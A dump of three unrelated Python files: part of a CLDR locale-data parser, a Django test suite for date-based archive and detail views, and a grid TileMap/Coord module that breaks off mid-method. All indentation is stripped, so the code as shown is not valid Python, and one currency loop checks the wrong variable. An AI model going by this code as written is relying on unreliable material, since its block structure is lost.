format = child.get("type")
if child.findall("relative"):
relativeField = self.__getStore(relatives, format)
for relChild in child.findall("relative"):
if not relChild.get("draft"):
pos = relChild.get("type")
text = relChild.text
if not pos in relativeField:
relativeField[pos] = text
def __addNumbers(self, tree):
store = self.__getStore(self.__data, "number")
# Symbols
symbols = self.__getStore(store, "symbol")
for element in tree.findall("numbers/symbols/*"):
if not element.get("draft"):
field = camelCaseToUpper(element.tag)
if not field in store:
symbols[field] = element.text
# Formats
if not "format" in store:
store["format"] = {}
for format in ["decimal", "scientific", "percent", "currency"]:
if not format in store["format"]:
for element in tree.findall("numbers//%sFormat/pattern" % format):
store["format"][camelCaseToUpper(format)] = element.text
# Currencies
currencies = self.__getStore(store, "currencyName")
currenciesSymbols = self.__getStore(store, "currencySymbol")
for child in tree.findall("numbers/currencies/currency"):
if not child.get("draft"):
short = child.get("type")
for nameChild in child.findall("displayName"):
if not nameChild.get("draft"):
text = nameChild.text
if not format in currencies:
currencies[short] = text
break
for symbolChild in child.findall("symbol"):
currenciesSymbols[short] = symbolChild.text
|
|
from __future__ import unicode_literals
import datetime
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase, override_settings, skipUnlessDBFeature
from django.test.utils import requires_tz_support
from django.utils import timezone
from .models import Book, BookSigning
def _make_books(n, base_date):
for i in range(n):
Book.objects.create(
name='Book %d' % i,
slug='book-%d' % i,
pages=100 + i,
pubdate=base_date - datetime.timedelta(days=i))
class ArchiveIndexViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_archive_view(self):
res = self.client.get('/dates/books/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'year', 'DESC')))
self.assertEqual(list(res.context['latest']), list(Book.objects.all()))
self.assertTemplateUsed(res, 'tests:templates/book_archive.html')
def test_archive_view_context_object_name(self):
res = self.client.get('/dates/books/context_object_name/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'year', 'DESC')))
self.assertEqual(list(res.context['thingies']), list(Book.objects.all()))
self.assertFalse('latest' in res.context)
self.assertTemplateUsed(res, 'tests:templates/book_archive.html')
def test_empty_archive_view(self):
Book.objects.all().delete()
res = self.client.get('/dates/books/')
self.assertEqual(res.status_code, 404)
def test_allow_empty_archive_view(self):
Book.objects.all().delete()
res = self.client.get('/dates/books/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [])
self.assertTemplateUsed(res, 'tests:templates/book_archive.html')
def test_archive_view_template(self):
res = self.client.get('/dates/books/template_name/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'year', 'DESC')))
self.assertEqual(list(res.context['latest']), list(Book.objects.all()))
self.assertTemplateUsed(res, 'tests:templates/list.html')
def test_archive_view_template_suffix(self):
res = self.client.get('/dates/books/template_name_suffix/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'year', 'DESC')))
self.assertEqual(list(res.context['latest']), list(Book.objects.all()))
self.assertTemplateUsed(res, 'tests:templates/book_detail.html')
def test_archive_view_invalid(self):
self.assertRaises(ImproperlyConfigured, self.client.get, '/dates/books/invalid/')
def test_archive_view_by_month(self):
res = self.client.get('/dates/books/by_month/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'month', 'DESC')))
def test_paginated_archive_view(self):
_make_books(20, base_date=datetime.date.today())
res = self.client.get('/dates/books/paginated/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'year', 'DESC')))
self.assertEqual(list(res.context['latest']), list(Book.objects.all()[0:10]))
self.assertTemplateUsed(res, 'tests:templates/book_archive.html')
res = self.client.get('/dates/books/paginated/?page=2')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['page_obj'].number, 2)
self.assertEqual(list(res.context['latest']), list(Book.objects.all()[10:20]))
def test_paginated_archive_view_does_not_load_entire_table(self):
# Regression test for #18087
_make_books(20, base_date=datetime.date.today())
# 1 query for years list + 1 query for books
with self.assertNumQueries(2):
self.client.get('/dates/books/')
# same as above + 1 query to test if books exist + 1 query to count them
with self.assertNumQueries(4):
self.client.get('/dates/books/paginated/')
def test_no_duplicate_query(self):
# Regression test for #18354
with self.assertNumQueries(2):
self.client.get('/dates/books/reverse/')
def test_datetime_archive_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
res = self.client.get('/dates/booksignings/')
self.assertEqual(res.status_code, 200)
@requires_tz_support
@skipUnlessDBFeature('has_zoneinfo_database')
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_archive_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/')
self.assertEqual(res.status_code, 200)
def test_date_list_order(self):
"""date_list should be sorted descending in index"""
_make_books(5, base_date=datetime.date(2011, 12, 25))
res = self.client.get('/dates/books/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(reversed(sorted(res.context['date_list']))))
class YearArchiveViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_year_view(self):
res = self.client.get('/dates/books/2008/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [datetime.date(2008, 10, 1)])
self.assertEqual(res.context['year'], datetime.date(2008, 1, 1))
self.assertTemplateUsed(res, 'tests:templates/book_archive_year.html')
# Since allow_empty=False, next/prev years must be valid (#7164)
self.assertEqual(res.context['next_year'], None)
self.assertEqual(res.context['previous_year'], datetime.date(2006, 1, 1))
def test_year_view_make_object_list(self):
res = self.client.get('/dates/books/2006/make_object_list/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [datetime.date(2006, 5, 1)])
self.assertEqual(list(res.context['book_list']), list(Book.objects.filter(pubdate__year=2006)))
self.assertEqual(list(res.context['object_list']), list(Book.objects.filter(pubdate__year=2006)))
self.assertTemplateUsed(res, 'tests:templates/book_archive_year.html')
def test_year_view_empty(self):
res = self.client.get('/dates/books/1999/')
self.assertEqual(res.status_code, 404)
res = self.client.get('/dates/books/1999/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [])
self.assertEqual(list(res.context['book_list']), [])
# Since allow_empty=True, next/prev are allowed to be empty years (#7164)
self.assertEqual(res.context['next_year'], datetime.date(2000, 1, 1))
self.assertEqual(res.context['previous_year'], datetime.date(1998, 1, 1))
def test_year_view_allow_future(self):
# Create a new book in the future
year = datetime.date.today().year + 1
Book.objects.create(name="The New New Testement", pages=600, pubdate=datetime.date(year, 1, 1))
res = self.client.get('/dates/books/%s/' % year)
self.assertEqual(res.status_code, 404)
res = self.client.get('/dates/books/%s/allow_empty/' % year)
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), [])
res = self.client.get('/dates/books/%s/allow_future/' % year)
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [datetime.date(year, 1, 1)])
def test_year_view_paginated(self):
res = self.client.get('/dates/books/2006/paginated/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), list(Book.objects.filter(pubdate__year=2006)))
self.assertEqual(list(res.context['object_list']), list(Book.objects.filter(pubdate__year=2006)))
self.assertTemplateUsed(res, 'tests:templates/book_archive_year.html')
def test_year_view_invalid_pattern(self):
res = self.client.get('/dates/books/no_year/')
self.assertEqual(res.status_code, 404)
def test_no_duplicate_query(self):
# Regression test for #18354
with self.assertNumQueries(4):
self.client.get('/dates/books/2008/reverse/')
def test_datetime_year_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
res = self.client.get('/dates/booksignings/2008/')
self.assertEqual(res.status_code, 200)
@skipUnlessDBFeature('has_zoneinfo_database')
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_year_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/2008/')
self.assertEqual(res.status_code, 200)
def test_date_list_order(self):
"""date_list should be sorted ascending in year view"""
_make_books(10, base_date=datetime.date(2011, 12, 25))
res = self.client.get('/dates/books/2011/')
self.assertEqual(list(res.context['date_list']), list(sorted(res.context['date_list'])))
class MonthArchiveViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_month_view(self):
res = self.client.get('/dates/books/2008/oct/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'tests:templates/book_archive_month.html')
self.assertEqual(list(res.context['date_list']), [datetime.date(2008, 10, 1)])
self.assertEqual(list(res.context['book_list']),
list(Book.objects.filter(pubdate=datetime.date(2008, 10, 1))))
self.assertEqual(res.context['month'], datetime.date(2008, 10, 1))
# Since allow_empty=False, next/prev months must be valid (#7164)
self.assertEqual(res.context['next_month'], None)
self.assertEqual(res.context['previous_month'], datetime.date(2006, 5, 1))
def test_month_view_allow_empty(self):
# allow_empty = False, empty month
res = self.client.get('/dates/books/2000/jan/')
self.assertEqual(res.status_code, 404)
# allow_empty = True, empty month
res = self.client.get('/dates/books/2000/jan/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [])
self.assertEqual(list(res.context['book_list']), [])
self.assertEqual(res.context['month'], datetime.date(2000, 1, 1))
# Since allow_empty=True, next/prev are allowed to be empty months (#7164)
self.assertEqual(res.context['next_month'], datetime.date(2000, 2, 1))
self.assertEqual(res.context['previous_month'], datetime.date(1999, 12, 1))
# allow_empty but not allow_future: next_month should be empty (#7164)
url = datetime.date.today().strftime('/dates/books/%Y/%b/allow_empty/').lower()
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_month'], None)
def test_month_view_allow_future(self):
future = (datetime.date.today() + datetime.timedelta(days=60)).replace(day=1)
urlbit = future.strftime('%Y/%b').lower()
b = Book.objects.create(name="The New New Testement", pages=600, pubdate=future)
# allow_future = False, future month
res = self.client.get('/dates/books/%s/' % urlbit)
self.assertEqual(res.status_code, 404)
# allow_future = True, valid future month
res = self.client.get('/dates/books/%s/allow_future/' % urlbit)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['date_list'][0], b.pubdate)
self.assertEqual(list(res.context['book_list']), [b])
self.assertEqual(res.context['month'], future)
# Since allow_future = True but not allow_empty, next/prev are not
# allowed to be empty months (#7164)
self.assertEqual(res.context['next_month'], None)
self.assertEqual(res.context['previous_month'], datetime.date(2008, 10, 1))
# allow_future, but not allow_empty, with a current month. So next
# should be in the future (yup, #7164, again)
res = self.client.get('/dates/books/2008/oct/allow_future/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_month'], future)
self.assertEqual(res.context['previous_month'], datetime.date(2006, 5, 1))
def test_month_view_paginated(self):
res = self.client.get('/dates/books/2008/oct/paginated/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), list(Book.objects.filter(pubdate__year=2008, pubdate__month=10)))
self.assertEqual(list(res.context['object_list']), list(Book.objects.filter(pubdate__year=2008, pubdate__month=10)))
self.assertTemplateUsed(res, 'tests:templates/book_archive_month.html')
def test_custom_month_format(self):
res = self.client.get('/dates/books/2008/10/')
self.assertEqual(res.status_code, 200)
def test_month_view_invalid_pattern(self):
res = self.client.get('/dates/books/2007/no_month/')
self.assertEqual(res.status_code, 404)
def test_previous_month_without_content(self):
"Content can exist on any day of the previous month. Refs #14711"
self.pubdate_list = [
datetime.date(2010, month, day)
for month, day in ((9, 1), (10, 2), (11, 3))
]
for pubdate in self.pubdate_list:
name = str(pubdate)
Book.objects.create(name=name, slug=name, pages=100, pubdate=pubdate)
res = self.client.get('/dates/books/2010/nov/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['previous_month'], datetime.date(2010, 10, 1))
# The following test demonstrates the bug
res = self.client.get('/dates/books/2010/nov/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['previous_month'], datetime.date(2010, 10, 1))
# The bug does not occur here because a Book with pubdate of Sep 1 exists
res = self.client.get('/dates/books/2010/oct/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['previous_month'], datetime.date(2010, 9, 1))
def test_datetime_month_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 2, 1, 12, 0))
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
BookSigning.objects.create(event_date=datetime.datetime(2008, 6, 3, 12, 0))
res = self.client.get('/dates/booksignings/2008/apr/')
self.assertEqual(res.status_code, 200)
@skipUnlessDBFeature('has_zoneinfo_database')
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_month_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 2, 1, 12, 0, tzinfo=timezone.utc))
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
BookSigning.objects.create(event_date=datetime.datetime(2008, 6, 3, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/2008/apr/')
self.assertEqual(res.status_code, 200)
def test_date_list_order(self):
"""date_list should be sorted ascending in month view"""
_make_books(10, base_date=datetime.date(2011, 12, 25))
res = self.client.get('/dates/books/2011/dec/')
self.assertEqual(list(res.context['date_list']), list(sorted(res.context['date_list'])))
class WeekArchiveViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_week_view(self):
res = self.client.get('/dates/books/2008/week/39/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'tests:templates/book_archive_week.html')
self.assertEqual(res.context['book_list'][0], Book.objects.get(pubdate=datetime.date(2008, 10, 1)))
self.assertEqual(res.context['week'], datetime.date(2008, 9, 28))
# Since allow_empty=False, next/prev weeks must be valid
self.assertEqual(res.context['next_week'], None)
self.assertEqual(res.context['previous_week'], datetime.date(2006, 4, 30))
def test_week_view_allow_empty(self):
# allow_empty = False, empty week
res = self.client.get('/dates/books/2008/week/12/')
self.assertEqual(res.status_code, 404)
# allow_empty = True, empty month
res = self.client.get('/dates/books/2008/week/12/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), [])
self.assertEqual(res.context['week'], datetime.date(2008, 3, 23))
# Since allow_empty=True, next/prev are allowed to be empty weeks
self.assertEqual(res.context['next_week'], datetime.date(2008, 3, 30))
self.assertEqual(res.context['previous_week'], datetime.date(2008, 3, 16))
# allow_empty but not allow_future: next_week should be empty
url = datetime.date.today().strftime('/dates/books/%Y/week/%U/allow_empty/').lower()
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_week'], None)
def test_week_view_allow_future(self):
# January 7th always falls in week 1, given Python's definition of week numbers
future = datetime.date(datetime.date.today().year + 1, 1, 7)
future_sunday = future - datetime.timedelta(days=(future.weekday() + 1) % 7)
b = Book.objects.create(name="The New New Testement", pages=600, pubdate=future)
res = self.client.get('/dates/books/%s/week/1/' % future.year)
self.assertEqual(res.status_code, 404)
res = self.client.get('/dates/books/%s/week/1/allow_future/' % future.year)
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), [b])
self.assertEqual(res.context['week'], future_sunday)
# Since allow_future = True but not allow_empty, next/prev are not
# allowed to be empty weeks
self.assertEqual(res.context['next_week'], None)
self.assertEqual(res.context['previous_week'], datetime.date(2008, 9, 28))
# allow_future, but not allow_empty, with a current week. So next
# should be in the future
res = self.client.get('/dates/books/2008/week/39/allow_future/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_week'], future_sunday)
self.assertEqual(res.context['previous_week'], datetime.date(2006, 4, 30))
def test_week_view_paginated(self):
week_start = datetime.date(2008, 9, 28)
week_end = week_start + datetime.timedelta(days=7)
res = self.client.get('/dates/books/2008/week/39/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), list(Book.objects.filter(pubdate__gte=week_start, pubdate__lt=week_end)))
self.assertEqual(list(res.context['object_list']), list(Book.objects.filter(pubdate__gte=week_start, pubdate__lt=week_end)))
self.assertTemplateUsed(res, 'tests:templates/book_archive_week.html')
def test_week_view_invalid_pattern(self):
res = self.client.get('/dates/books/2007/week/no_week/')
self.assertEqual(res.status_code, 404)
def test_week_start_Monday(self):
# Regression for #14752
res = self.client.get('/dates/books/2008/week/39/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['week'], datetime.date(2008, 9, 28))
res = self.client.get('/dates/books/2008/week/39/monday/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['week'], datetime.date(2008, 9, 29))
def test_datetime_week_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
res = self.client.get('/dates/booksignings/2008/week/13/')
self.assertEqual(res.status_code, 200)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_week_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/2008/week/13/')
self.assertEqual(res.status_code, 200)
class DayArchiveViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_day_view(self):
res = self.client.get('/dates/books/2008/oct/01/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'tests:templates/book_archive_day.html')
self.assertEqual(list(res.context['book_list']),
list(Book.objects.filter(pubdate=datetime.date(2008, 10, 1))))
self.assertEqual(res.context['day'], datetime.date(2008, 10, 1))
# Since allow_empty=False, next/prev days must be valid.
self.assertEqual(res.context['next_day'], None)
self.assertEqual(res.context['previous_day'], datetime.date(2006, 5, 1))
def test_day_view_allow_empty(self):
# allow_empty = False, empty month
res = self.client.get('/dates/books/2000/jan/1/')
self.assertEqual(res.status_code, 404)
# allow_empty = True, empty month
res = self.client.get('/dates/books/2000/jan/1/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), [])
self.assertEqual(res.context['day'], datetime.date(2000, 1, 1))
# Since it's allow empty, next/prev are allowed to be empty months (#7164)
self.assertEqual(res.context['next_day'], datetime.date(2000, 1, 2))
self.assertEqual(res.context['previous_day'], datetime.date(1999, 12, 31))
# allow_empty but not allow_future: next_month should be empty (#7164)
url = datetime.date.today().strftime('/dates/books/%Y/%b/%d/allow_empty/').lower()
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_day'], None)
def test_day_view_allow_future(self):
future = (datetime.date.today() + datetime.timedelta(days=60))
urlbit = future.strftime('%Y/%b/%d').lower()
b = Book.objects.create(name="The New New Testement", pages=600, pubdate=future)
# allow_future = False, future month
res = self.client.get('/dates/books/%s/' % urlbit)
self.assertEqual(res.status_code, 404)
# allow_future = True, valid future month
res = self.client.get('/dates/books/%s/allow_future/' % urlbit)
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), [b])
self.assertEqual(res.context['day'], future)
# allow_future but not allow_empty, next/prev must be valid
self.assertEqual(res.context['next_day'], None)
self.assertEqual(res.context['previous_day'], datetime.date(2008, 10, 1))
# allow_future, but not allow_empty, with a current month.
res = self.client.get('/dates/books/2008/oct/01/allow_future/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_day'], future)
self.assertEqual(res.context['previous_day'], datetime.date(2006, 5, 1))
# allow_future for yesterday, next_day is today (#17192)
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
res = self.client.get('/dates/books/%s/allow_empty_and_future/'
% yesterday.strftime('%Y/%b/%d').lower())
self.assertEqual(res.context['next_day'], today)
def test_day_view_paginated(self):
res = self.client.get('/dates/books/2008/oct/1/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), list(Book.objects.filter(pubdate__year=2008, pubdate__month=10, pubdate__day=1)))
self.assertEqual(list(res.context['object_list']), list(Book.objects.filter(pubdate__year=2008, pubdate__month=10, pubdate__day=1)))
self.assertTemplateUsed(res, 'tests:templates/book_archive_day.html')
def test_next_prev_context(self):
res = self.client.get('/dates/books/2008/oct/01/')
self.assertEqual(res.content, b"Archive for Oct. 1, 2008. Previous day is May 1, 2006")
def test_custom_month_format(self):
res = self.client.get('/dates/books/2008/10/01/')
self.assertEqual(res.status_code, 200)
def test_day_view_invalid_pattern(self):
res = self.client.get('/dates/books/2007/oct/no_day/')
self.assertEqual(res.status_code, 404)
def test_today_view(self):
res = self.client.get('/dates/books/today/')
self.assertEqual(res.status_code, 404)
res = self.client.get('/dates/books/today/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['day'], datetime.date.today())
def test_datetime_day_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
res = self.client.get('/dates/booksignings/2008/apr/2/')
self.assertEqual(res.status_code, 200)
@requires_tz_support
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_day_view(self):
bs = BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/2008/apr/2/')
self.assertEqual(res.status_code, 200)
# 2008-04-02T00:00:00+03:00 (beginning of day) > 2008-04-01T22:00:00+00:00 (book signing event date)
bs.event_date = datetime.datetime(2008, 4, 1, 22, 0, tzinfo=timezone.utc)
bs.save()
res = self.client.get('/dates/booksignings/2008/apr/2/')
self.assertEqual(res.status_code, 200)
# 2008-04-03T00:00:00+03:00 (end of day) > 2008-04-02T22:00:00+00:00 (book signing event date)
bs.event_date = datetime.datetime(2008, 4, 2, 22, 0, tzinfo=timezone.utc)
bs.save()
res = self.client.get('/dates/booksignings/2008/apr/2/')
self.assertEqual(res.status_code, 404)
class DateDetailViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_date_detail_by_pk(self):
res = self.client.get('/dates/books/2008/oct/01/1/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], Book.objects.get(pk=1))
self.assertEqual(res.context['book'], Book.objects.get(pk=1))
self.assertTemplateUsed(res, 'tests:templates/book_detail.html')
def test_date_detail_by_slug(self):
res = self.client.get('/dates/books/2006/may/01/byslug/dreaming-in-code/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['book'], Book.objects.get(slug='dreaming-in-code'))
def test_date_detail_custom_month_format(self):
res = self.client.get('/dates/books/2008/10/01/1/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['book'], Book.objects.get(pk=1))
def test_date_detail_allow_future(self):
future = (datetime.date.today() + datetime.timedelta(days=60))
urlbit = future.strftime('%Y/%b/%d').lower()
b = Book.objects.create(name="The New New Testement", slug="new-new", pages=600, pubdate=future)
res = self.client.get('/dates/books/%s/new-new/' % urlbit)
self.assertEqual(res.status_code, 404)
res = self.client.get('/dates/books/%s/%s/allow_future/' % (urlbit, b.id))
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['book'], b)
        self.assertTemplateUsed(res, 'generic_views/book_detail.html')
def test_invalid_url(self):
self.assertRaises(AttributeError, self.client.get, "/dates/books/2008/oct/01/nopk/")
def test_get_object_custom_query(self):
"""
        Ensure that custom querysets are used when provided to
        BaseDateDetailView.get_object().
Refs #16918.
"""
res = self.client.get(
'/dates/books/get_object_custom_query/2006/may/01/2/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], Book.objects.get(pk=2))
self.assertEqual(res.context['book'], Book.objects.get(pk=2))
        self.assertTemplateUsed(res, 'generic_views/book_detail.html')
res = self.client.get(
'/dates/books/get_object_custom_query/2008/oct/01/1/')
self.assertEqual(res.status_code, 404)
def test_datetime_date_detail(self):
bs = BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
res = self.client.get('/dates/booksignings/2008/apr/2/%d/' % bs.pk)
self.assertEqual(res.status_code, 200)
@requires_tz_support
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_date_detail(self):
bs = BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/2008/apr/2/%d/' % bs.pk)
self.assertEqual(res.status_code, 200)
# 2008-04-02T00:00:00+03:00 (beginning of day) > 2008-04-01T22:00:00+00:00 (book signing event date)
bs.event_date = datetime.datetime(2008, 4, 1, 22, 0, tzinfo=timezone.utc)
bs.save()
res = self.client.get('/dates/booksignings/2008/apr/2/%d/' % bs.pk)
self.assertEqual(res.status_code, 200)
# 2008-04-03T00:00:00+03:00 (end of day) > 2008-04-02T22:00:00+00:00 (book signing event date)
bs.event_date = datetime.datetime(2008, 4, 2, 22, 0, tzinfo=timezone.utc)
bs.save()
res = self.client.get('/dates/booksignings/2008/apr/2/%d/' % bs.pk)
self.assertEqual(res.status_code, 404)
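# A minimal sketch (illustration only, not part of the original test suite) of
# the kind of date-based generic view these URLs imply. The attribute values
# are assumptions inferred from the test URLs above, not the real
# generic_views fixture views.
from django.views.generic.dates import DayArchiveView
class _ExampleBookDayArchive(DayArchiveView):
    """Hypothetical view mirroring /dates/books/<year>/<mon>/<day>/."""
    model = Book                # the Book model exercised by the tests above
    date_field = 'pubdate'
    month_format = '%b'         # three-letter month segments such as 'oct'
    allow_empty = False         # empty days 404 unless allow_empty is set
    allow_future = False        # future dates 404 unless allow_future is set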
|
|
__all__ = ('Coord', 'TileMap')
from collections import defaultdict, namedtuple
from filters import is_tile
class TileMapStorage(object):
def __init__(self, width, height):
self.width = width
self.height = height
self.tiles = []
for y in range(self.height):
self.tiles.append([0] * self.width)
def __getitem__(self, subscript):
assert isinstance(subscript, Coord)
return self.tiles[subscript.y][subscript.x]
def __setitem__(self, subscript, value):
assert isinstance(subscript, Coord)
self.tiles[subscript.y][subscript.x] = value
def copy(self):
storage = self.__class__(width=self.width, height=self.height)
storage.tiles = []
for y in range(self.height):
storage.tiles.append(list(self.tiles[y]))
return storage
class Coord(namedtuple('Coord', ['x', 'y'])):
@classmethod
def from_tuple(cls, tup):
if isinstance(tup, cls):
return tup
else:
return cls(tup[0], tup[1])
@classmethod
def range(cls, c1, c2):
for y in range(c1[1], c2[1]):
for x in range(c1[0], c2[0]):
yield Coord(x, y)
@classmethod
def width(cls, c1, c2):
return abs(c1[0] - c2[0])
@classmethod
def height(cls, c1, c2):
return abs(c1[1] - c2[1])
def __add__(self, other):
return self.__class__(self[0] + other[0], self[1] + other[1])
def __sub__(self, other):
return self.__class__(self[0] - other[0], self[1] - other[1])
def __mul__(self, scalar):
return self.__class__(self[0] * scalar, self[1] * scalar)
def __neg__(self):
return self.__class__(-self[0], -self[1])
Coord.X = Coord(1, 0)
Coord.Y = Coord(0, 1)
class TileMap(object):
"""Subscriptable, editable view onto a TileMap."""
def __init__(self, tl=None, br=None, width=0, height=0, storage=None):
if tl is None:
tl = Coord(0, 0)
else:
tl = Coord.from_tuple(tl)
if br is None:
br = Coord(tl.x + width, tl.y + height)
else:
br = Coord.from_tuple(br)
if storage is None:
storage = TileMapStorage(width, height)
assert isinstance(storage, TileMapStorage)
assert tl.x >= 0
assert tl.y >= 0
assert tl.x < br.x
assert tl.y < br.y
assert br.x <= storage.width
assert br.y <= storage.height
self.storage = storage
self.tl = tl
self.br = br
@property
def width(self):
return Coord.width(self.tl, self.br)
@property
def height(self):
return Coord.height(self.tl, self.br)
@classmethod
def clone(cls, tile_map):
return cls(tl=tile_map.tl, br=tile_map.br, storage=tile_map.storage)
def to_other(self, coord, other):
return Coord(coord.x + self.tl.x - other.tl.x,
coord.y + self.tl.y - other.tl.y)
def _local_to_storage(self, coord):
return Coord(coord.x + self.tl.x, coord.y + self.tl.y)
def _storage_to_local(self, coord):
return Coord(coord.x - self.tl.x, coord.y - self.tl.y)
def _parse_subscript(self, subscript):
if isinstance(subscript, slice):
assert isinstance(subscript.start, tuple)
assert len(subscript.start) == 2
assert isinstance(subscript.stop, tuple)
assert len(subscript.stop) == 2
subscript = (
slice(subscript.start[0], subscript.stop[0]),
slice(subscript.start[1], subscript.stop[1]),
)
assert isinstance(subscript, tuple)
assert len(subscript) == 2
x, y = subscript
width, height = (1, 1)
if isinstance(x, slice):
start, stop, step = x.start, x.stop, x.step
if start is None: start = 0
if stop is None: stop = self.width
if step is None: step = 1
assert step == 1
width = stop - start
x = start
if isinstance(y, slice):
start, stop, step = y.start, y.stop, y.step
if start is None: start = 0
if stop is None: stop = self.height
if step is None: step = 1
assert step == 1
height = stop - start
y = start
if x < 0 or x + width > self.width or \
y < 0 or y + height > self.height or \
width == 0 or height == 0:
raise IndexError(subscript)
return Coord(x, y), Coord(x + width, y + height)
def __str__(self):
lines = ['']
for y in range(self.tl.y, self.br.y):
line = []
for x in range(self.tl.x, self.br.x):
line.append('%3s' % repr(self.storage[Coord(x, y)]))
lines.append(' '.join(line))
return '\n '.join(lines)
def __getitem__(self, subscript):
"""Return the value at (x, y), or a subview of the range (if either x or y is a slice)."""
tl, br = self._parse_subscript(subscript)
if Coord.width(tl, br) == 1 and Coord.height(tl, br) == 1:
tl = self._local_to_storage(tl)
return self.storage[tl]
else:
return self.subview(tl=tl, br=br)
def __setitem__(self, subscript, value):
"""Set the value at (x, y), or fill the range (if either x or y is a slice) with the value."""
tl, br = self._parse_subscript(subscript)
        if isinstance(value, TileMap):
            for coord in Coord.range(tl, br):
                # Offset of this cell within the assigned range, looked up in
                # the source map's storage coordinates.
